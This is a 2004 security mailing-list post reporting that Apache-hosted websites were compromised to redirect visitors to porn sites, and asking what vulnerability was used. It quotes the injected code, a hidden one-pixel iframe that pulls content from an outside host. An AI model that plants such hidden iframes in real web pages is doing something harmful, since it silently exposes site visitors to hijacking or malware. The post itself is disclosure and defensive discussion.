[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] browser hijack by apache sites

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] browser hijack by apache sites
From: Filbert <filbert@xxxxxxxxxx>
Date: Sun, 23 May 2004 15:19:30 +0200

Hi,

This is the second time this weekend that I've been warned of an apache site 
on a Linux server were a line of code was added to redirect browsers to  porn 
sites.
First was the site of a Belgian political party. Second came today, and as of 
writing this it's still there. The admin was informed so it can be gone soon.

hxxp://www.previsit.com/carrefour/nl/ <- hxxp must changed to http
IE users do NOT click.

the code added at the bottom is:

<iframe SRC="http://www.b00gle.com/fa/?d=get"; WIDTH=1 
HEIGHT=1></iframe></body>

anyone seen this before? What vulnerability is exploited here? FP?

Thx,
Filb.

-- 
echo "+++ATH0filb@+++ATH0filb@linuxmail.org" | sed 's/+++ATH0//g'


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: [Full-Disclosure] [ GLSA 200405-18 ] Buffer Overflow in Firebird
Next by Date: Re: [Full-Disclosure] C# Web application security scanner
Previous by thread: [Full-Disclosure] [ GLSA 200405-18 ] Buffer Overflow in Firebird
Next by thread: Re: [Full-Disclosure] browser hijack by apache sites
Index(es):
- Date
- Thread